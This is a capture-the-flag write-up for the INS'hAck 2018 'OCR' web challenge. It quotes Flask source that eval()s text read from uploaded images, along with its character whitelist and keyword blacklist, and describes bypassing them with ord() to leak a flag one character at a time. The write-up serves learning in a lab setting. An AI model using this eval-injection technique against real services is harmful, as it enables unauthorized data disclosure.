INShAck 2018 - OCR

This second web challenge from the INS’hAck 2018 CTF was pretty original:

Because creating real pwn challs was to mainstream, we decided to focus on the development of our equation solver using OCR.

That description was vague, but once on the website things became clear.

The description actually told us all there was to know: this was a website using OCR to solve equations depicted in images. You could upload a picture containing a (simple) equation, and it would output the answer. For the example image, it would output Wow, it works !. I then checked the webpage’s source code, and there was a pretty obvious hint in it:

<!-- TODO : Remove me : -->
<!-- /debug-->

Accessing /debug returned a Python file containing the homepage’s source code. And that’s when the real fun began. The first interesting thing in the code is this line:

x = open("private/flag.txt").read()

So we have a variable named x containing the flag. Now the question is: how can we output it? The next interesting part of the code is this one:

try:
  if "==" in formated_text:
      parts = formated_text.split("==",maxsplit=2)
      pa_1 = int(eval(parts[0]))
      pa_2 = int(eval(parts[1]))
      if pa_1 == pa_2:
          return render_template('result.html', result = "Wow, it works !")
      else:
          return render_template('result.html', result = "Sorry but it seems that %d is not equal to %d"%(pa_1,pa_2))
  else:
      return render_template('result.html', result = "Please import a valid equation !")

formated_text contains the text written on the uploaded image (after being sanitized, as we will see). Two important things happen here: 1) our input goes through eval(), which means that we can execute some Python code, and 2) the result of that execution is printed back to us if the equation is valid but incorrect. That result has to be convertible to an int, though, or we get an error. So what we have to do is pretty clear: upload an image containing a false equation with some Python code in it. But it’s not that simple, since multiple checks are done on our input:
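To make the leak concrete, here is a minimal local sketch of the equation branch quoted above. It is not the server's code: solve() and the placeholder flag are hypothetical, the filters are left out, and x is passed to eval() explicitly so the snippet runs on its own (the real handler calls eval() with x in scope).

```python
# Placeholder value; on the server, x is read from private/flag.txt.
FAKE_FLAG = "INSA{example}"


def solve(formated_text, x=FAKE_FLAG):
    """Mimic the quoted equation branch (sanitizing checks omitted)."""
    if "==" not in formated_text:
        return "Please import a valid equation !"
    parts = formated_text.split("==", maxsplit=2)
    # Each side is evaluated as Python, then forced to an int.
    pa_1 = int(eval(parts[0], {"x": x}))
    pa_2 = int(eval(parts[1], {"x": x}))
    if pa_1 == pa_2:
        return "Wow, it works !"
    # A false equation echoes both evaluated sides back to the user.
    return "Sorry but it seems that %d is not equal to %d" % (pa_1, pa_2)


print(solve("1+1==2"))        # Wow, it works !
print(solve("ord(x[0])==1"))  # Sorry but it seems that 73 is not equal to 1
```

Any expression that evaluates to an int and is deliberately "wrong" ends up in the error message, which is the whole output channel.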

if any(i not in 'abcdefghijklmnopqrstuvwxyz0123456789()[]=+-*' for i in formated_text):
    return render_template('result.html', result = "Some features are still in beta !")
if formated_text.count('(') > 1 or formated_text.count(')') > 1 or formated_text.count('[') > 1 or formated_text.count(']') > 1 :
    return render_template('result.html', result = "We can not solve complex equations for now !")
if any(i in formated_text for i in ["import","exec","compile","tesseract","chr","os","write","sleep"]):
    return render_template('result.html', result = "We can not understand your equation !")
if len(formated_text) > 15:
    return render_template('result.html', result = "We can not solve complex equations for now !")

As you can see, this limits what we can do a great deal: the characters we can use are restricted, we can’t use more than one of each parenthesis or bracket, some important Python functions are filtered, and most importantly, our injection has to be 15 characters or less. So, to summarize: we had to upload an image containing an incorrect equation, with some Python code in it that reads the x variable containing the flag and outputs it as an int. It took me a little while to realize that chr() is filtered, but ord() is not. And ord() does exactly what we need: it takes a character and turns it into an int. Plus, it doesn’t require a lot of characters (unlike some of the transformations I had in mind), so it easily fits in 15 characters. So I made a simple image containing an equation with ord() in it.
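Candidate payloads can be checked offline before being drawn into an image. The sketch below reproduces the four checks from the quoted source. passes_filters, ALLOWED and BANNED are names introduced here, and ord(x[0])==1 is an assumed payload shape that matches the reported output, not necessarily the exact text of the original image.

```python
ALLOWED = "abcdefghijklmnopqrstuvwxyz0123456789()[]=+-*"
BANNED = ["import", "exec", "compile", "tesseract", "chr", "os", "write", "sleep"]


def passes_filters(text):
    """Return True if text survives the four checks from the handler."""
    if any(c not in ALLOWED for c in text):
        return False  # character outside the whitelist
    if any(text.count(c) > 1 for c in "()[]"):
        return False  # more than one of a given parenthesis or bracket
    if any(word in text for word in BANNED):
        return False  # blacklisted substring
    return len(text) <= 15


for candidate in ["ord(x[0])==1", "ord(x[13])==1", "chr(65)==1", "x[0]==x[1]"]:
    print(candidate, passes_filters(candidate))
# ord(x[0])==1 True
# ord(x[13])==1 True
# chr(65)==1 False
# x[0]==x[1] False
```

A payload of this shape uses exactly one pair of parentheses and one pair of brackets, which is why only one character can be read per upload.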

And it worked: Sorry but it seems that 73 is not equal to 1. I don’t know if there was a way to automate this in 15 characters (since ord() can only read one character at a time and there was a captcha), but I couldn’t think of one (I’m looking forward to reading other write-ups and feeling dumb). So I manually, and painfully, edited and re-uploaded my image to retrieve the whole flag: 73 78 83 65 123 48 99 114 95 76 48 110 103 125. All that was left to do was to reverse it with chr() to get the flag in clear:

INSA{0cr_L0ng}
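The decoding step is a one-liner. A small sketch, with codes holding the values read from the error messages:

```python
# Values leaked one per upload through the "is not equal to" message.
codes = [73, 78, 83, 65, 123, 48, 99, 114, 95, 76, 48, 110, 103, 125]

# chr() is the inverse of ord(): map each code point back to its character.
flag = "".join(chr(c) for c in codes)
print(flag)  # INSA{0cr_L0ng}
```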

I think I was amongst the first five to validate it, so that’s pretty cool. :)

phi0
